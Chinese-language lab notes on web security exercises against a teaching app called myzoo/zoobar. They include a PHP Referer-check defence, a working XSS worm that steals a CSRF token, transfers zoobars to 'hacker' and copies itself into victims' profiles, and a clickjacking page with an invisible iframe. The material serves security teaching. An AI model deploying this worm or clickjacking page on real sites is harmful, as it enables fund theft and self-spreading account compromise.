信息安全实践:CSRF & XSS & Click Jacking
CSRF
防御
Refer
/* 在 transfer.php 中添加 */
echo $_SERVER['HTTP_REFERER'];
if ($_SERVER['HTTP_REFERER'] != "http://myzoo.com/transfer.php") {
echo "transfer fail";
}else{
echo "transfer pass";
}
XSS
蠕虫
<span id=hack>
<script>
/* 获得 token */
var a = new XMLHttpRequest();
var t, context;
a.onreadystatechange = function() {
if(a.readyState == 4) {
context = (a.responseText);
/* token 的 id 为 csrf */
alert(context.substr(context.indexOf("csrf")+24, 32))
t = context.substr(context.indexOf("csrf")+24, 32);
}
};
a.open("GET", "transfer.php", false);
a.send()
/* 偷取 zoobar */
var b = new XMLHttpRequest();
b.open("POST", "transfer.php", true);
b.setRequestHeader("content-type", "application/x-www-form-urlencoded");
w = "zoobars=1&recipient=hacker&submission=Send&csrf="+t;
b.send(w);
/* 蠕虫,篡改 profile */
var c = new XMLHttpRequest();
c.open("POST", "index.php", true);
c.setRequestHeader("Content-type","application/x-www-form-urlencoded");
str = "<span id=hack>" + document.getElementById("hack").innerHTML + "</span>";
str = encodeURIComponent(str);
w = "profile_submit=Save&profile_update=" + str;
c.send(w);
</script>
</span>
Click Jacking
<!DOCTYPE html>
<html>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<head>
<title>click attack</title>
<style>
iframe {
width: 600px;
height: 450px;
position: absolute; /* 只有 position 为非 static 时 z-index 才能起作用 */
top: -0px;
left: -0px;
z-index: 2;
-moz-opacity: 0; /* 兼容,同 opacity */
filter: alpha(opacity=0); /* 兼容 IE8 以下的 IE 浏览器,同 opacity,filter为 IE 特有 */
opacity: 0;
}
button {
position: absolute;
top: 350px;
left: 170px;
z-index: -1;
width: 75px;
height:30px;
}
</style>
</head>
<body>
<iframe name="real" src="http:www.myzoo.com/transfer.php"> </iframe>
<button>click!</button>
</body>
</html>